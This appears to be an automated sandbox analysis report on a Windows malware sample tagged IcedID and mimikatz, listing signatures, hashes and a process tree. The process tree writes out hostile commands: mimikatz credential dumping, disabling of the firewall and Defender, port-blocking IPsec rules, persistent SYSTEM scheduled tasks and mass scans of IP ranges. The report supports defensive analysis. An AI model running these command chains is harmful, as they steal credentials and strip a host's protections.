Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-04-2024 03:47

General

  • Target

    2024-04-24_9f86be7d42da1d086498a939d96aa337_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    9f86be7d42da1d086498a939d96aa337

  • SHA1

    6bdeb89ee6ed991a020cebcf863815aeea6353d7

  • SHA256

    b0c2a96d7169769052613f756ac036c1561bc187d1afd12526782974c7164a4b

  • SHA512

    b2a610e4ff6cdbbced085971a4222542c7e765910b8ae0b8dedf5d29c8decdba97e9b7c65a472d48b01ced6ed6cc3b7bddb34121691daa09c90ec1ef0e46d7e2

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30300) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 43 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1512
      • C:\Windows\TEMP\wvflutbti\gfiitz.exe
        "C:\Windows\TEMP\wvflutbti\gfiitz.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
    • C:\Users\Admin\AppData\Local\Temp\2024-04-24_9f86be7d42da1d086498a939d96aa337_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-24_9f86be7d42da1d086498a939d96aa337_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:680
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\pifhbivn\blifehe.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:4856
        • C:\Windows\pifhbivn\blifehe.exe
          C:\Windows\pifhbivn\blifehe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3212
    • C:\Windows\pifhbivn\blifehe.exe
      C:\Windows\pifhbivn\blifehe.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3088
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:4836
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:5012
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2264
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:5068
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2156
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:3800
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:3632
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:640
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\jnrubemey\mzinlneik\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3816
                          • C:\Windows\jnrubemey\mzinlneik\wpcap.exe
                            C:\Windows\jnrubemey\mzinlneik\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:3212
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4700
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2668
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3200
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:4076
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3320
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:3156
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:3936
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:2996
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:1800
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2736
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:5080
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:4684
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:2628
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:4416
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jnrubemey\mzinlneik\Scant.txt
                                                2⤵
                                                  PID:4284
                                                  • C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe
                                                    C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jnrubemey\mzinlneik\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4632
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\jnrubemey\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jnrubemey\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:4004
                                                  • C:\Windows\jnrubemey\Corporate\vfshost.exe
                                                    C:\Windows\jnrubemey\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4316
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bifhilltf" /ru system /tr "cmd /c C:\Windows\ime\blifehe.exe"
                                                  2⤵
                                                    PID:3632
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:2572
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "bifhilltf" /ru system /tr "cmd /c C:\Windows\ime\blifehe.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:1812
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bikvmuezk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F"
                                                      2⤵
                                                        PID:1856
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:3520
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "bikvmuezk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:868
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tjzmgieyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F"
                                                          2⤵
                                                            PID:4604
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:1800
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "tjzmgieyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:3680
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:1612
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:1536
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:3756
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:768
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:3448
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:4104
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:1972
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:2392
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:4824
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:3224
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:3088
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:3520
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:1620
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:1988
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:1672
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:628
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:4496
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:2668
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:4076
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:1404
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:2864
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:4504
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:3160
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:1104
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:4396
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:4988
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:1544
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:60
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:3772
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1108
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:4336
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4296
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:1368
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4984
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:4252
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1220
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 796 C:\Windows\TEMP\jnrubemey\796.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4280
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:1960
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 64 C:\Windows\TEMP\jnrubemey\64.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4984
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1512 C:\Windows\TEMP\jnrubemey\1512.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4304
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2560 C:\Windows\TEMP\jnrubemey\2560.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4524
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2724 C:\Windows\TEMP\jnrubemey\2724.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5092
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2764 C:\Windows\TEMP\jnrubemey\2764.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2856
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 732 C:\Windows\TEMP\jnrubemey\732.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:744
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3740 C:\Windows\TEMP\jnrubemey\3740.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3948
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3828 C:\Windows\TEMP\jnrubemey\3828.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4572
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3896 C:\Windows\TEMP\jnrubemey\3896.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2120
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3980 C:\Windows\TEMP\jnrubemey\3980.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3112
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1144 C:\Windows\TEMP\jnrubemey\1144.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4400
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1120 C:\Windows\TEMP\jnrubemey\1120.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3988
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 4948 C:\Windows\TEMP\jnrubemey\4948.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3696
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 980 C:\Windows\TEMP\jnrubemey\980.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4608
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1288 C:\Windows\TEMP\jnrubemey\1288.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4044
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3812 C:\Windows\TEMP\jnrubemey\3812.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4684
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 5064 C:\Windows\TEMP\jnrubemey\5064.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2912
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\jnrubemey\mzinlneik\scan.bat
                                                                                                                          2⤵
                                                                                                                            PID:1080
                                                                                                                            • C:\Windows\jnrubemey\mzinlneik\lbwtnreih.exe
                                                                                                                              lbwtnreih.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:4540
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:4508
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:5348
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:4084
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:5860
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:5512
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:5924
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5260
                                                                                                                                      • C:\Windows\SysWOW64\ditziw.exe
                                                                                                                                        C:\Windows\SysWOW64\ditziw.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:472
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                        1⤵
                                                                                                                                          PID:4252
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            2⤵
                                                                                                                                              PID:4608
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:4972
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\blifehe.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:1936
                                                                                                                                                • C:\Windows\ime\blifehe.exe
                                                                                                                                                  C:\Windows\ime\blifehe.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:2872
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                1⤵
                                                                                                                                                  PID:2008
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4720
